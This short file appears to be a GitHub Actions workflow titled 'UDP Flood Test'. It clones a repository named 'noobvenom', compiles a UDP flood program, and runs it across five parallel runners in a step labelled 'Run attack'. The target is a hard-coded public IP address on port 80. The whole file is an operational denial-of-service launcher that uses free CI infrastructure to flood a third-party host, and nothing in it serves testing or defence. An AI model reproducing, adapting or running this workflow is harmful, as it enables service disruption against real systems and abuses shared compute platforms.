name: UDP Flood Test
on: workflow_dispatch

jobs:
  test:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        runner: [1, 2, 3, 4, 5]
    steps:
      - name: Clone repo
        run: git clone https://github.com/vrbrh921-glitch/noobvenom.git
      
      - name: Compile
        run: |
          cd noobvenom
          gcc -o udpflood udpflood.c -lpthread
      
      - name: Run attack
        run: |
          cd noobvenom
          ./udpflood 156.67.111.199 80 21000 100 1024
        continue-on-error: true
